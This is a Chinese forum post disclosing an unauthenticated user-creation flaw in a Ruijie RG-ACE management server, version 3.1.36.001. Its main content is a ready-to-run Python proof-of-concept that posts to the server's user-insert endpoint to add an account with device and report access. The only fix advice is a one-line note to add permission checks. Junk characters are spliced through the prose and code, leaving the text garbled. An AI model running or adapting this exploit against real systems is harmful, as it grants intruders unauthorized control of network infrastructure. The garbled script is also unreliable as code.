找回密码
 立即注册
查看: 2787|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)' k4 ]8 j# n5 S5 V( a; l

3 l7 U( |2 U3 ?* ?$ L% _
/ U& f# b1 w0 B0 p2 c测试的具体版本是& }2 m, O5 k0 u7 o: S$ b
产品名称: 锐捷应用控制引擎
& I1 U3 q+ G" r版本号: 3.1.36.001 TC
1 p! g, T4 S' p: ?. a编译时间: 201104291730" G: I5 ^* J" O4 P* j

6 L: X/ H8 J5 q$ z8 X& j- X
* q1 [0 @! ?1 V/ ]1 v+ K漏洞证明:9 H# ^( x+ o1 u- X7 S
' d7 V9 m2 L# H: H% e  Y0 J
" s: I- A" J7 V- H
' z4 d4 R0 y# o1 U
$ M! y, Z' N2 m( q( n! o( m# I
9 r( e. G+ @  a, G

7 s/ j! j% a( I. @4 }5 [执行脚本3 x9 H7 y) i3 @; e0 L6 i
#! /usr/bin/env python  t  ~0 _( i3 N4 k
#coding=gbk! [  f6 T$ c4 b( ^) ^! o
#RG-ACE管理服务器 V3.1.36.0012 ?% W* n. e1 O* z
import urllib2, urllib,cookielib
$ Y! V* X6 V; K" t! y4 f5 m+ E( e( s4 s  curl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
1 ~' o( E! z2 g# `# C  F* w1 Nopener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
% y- |( q: U7 a0 A& W) Xopener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]* j% r9 ?% t5 ~) H9 S; t' O" k
post=(("event","userManager.doInsertUserInfo"),' [" y* c+ {; U! D. q
("useractionname","addButtonValue"),
+ X; H& E/ H1 v- F. q("useropermanager","userManager"),9 q/ S. X0 j; j. U- Z
("userName","t"), #######账号自己加7 p. d6 ~$ |4 `' b
("pwd","aaaaaa"),######密码自己加
  G+ B6 o+ m8 C. t8 X" i3 c# c& T("trueName","ad"),
, u/ ~; x0 n+ l("email",""),% w- t1 I8 X+ S
("mobilePhone",""),4 j  d, p9 e9 Z7 N$ ~- T' n
("officePhone",""),1 ^. C3 }1 `; x  L8 j5 i
("addr",""),
/ ]- N' D, @/ L("submit","确定"))$ e" ~8 w* r  y) |$ p8 C9 o
urllib2.install_opener(opener)% |1 G' Z; R. Q! O5 G. [
p=urllib2.urlopen(url, urllib.urlencode(post)).read()2 n- H) c7 N+ ?$ W
print "Done"
3 ]$ B$ w/ b- H, \# J
7 T+ I6 D9 C; C登录,连接设备) _5 q1 T, Q! z* q& f: b

6 T: M* |  {: p; x, B' o, i! W' J
! `0 K) S: ^. p1 L* T9 N; {6 {- I9 }7 o6 [) C

; t$ i! ], h2 p4 l3 Y( Q7 B* k5 l$ P, r! S; G& X3 O0 d; u
默认的管理员admin权限更大点
0 F, N; P, d& ]- |' h- |; d
- f1 b# l8 r  y: Z9 g4 v5 x; j# [/ ^0 @* X3 v$ a* w

1 f0 h1 I/ X, U! j3 e+ V
/ ~7 |; x; \/ i% j; Q0 g
6 Z* _4 b6 S* k8 B- I8 v修复方案:# g; U8 V& x% V# ~2 @" S& q
加强对接口的权限验证; T. d: e: n/ I9 [  t1 u

' E* h: }6 @* U/ p4 K1 j, u
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表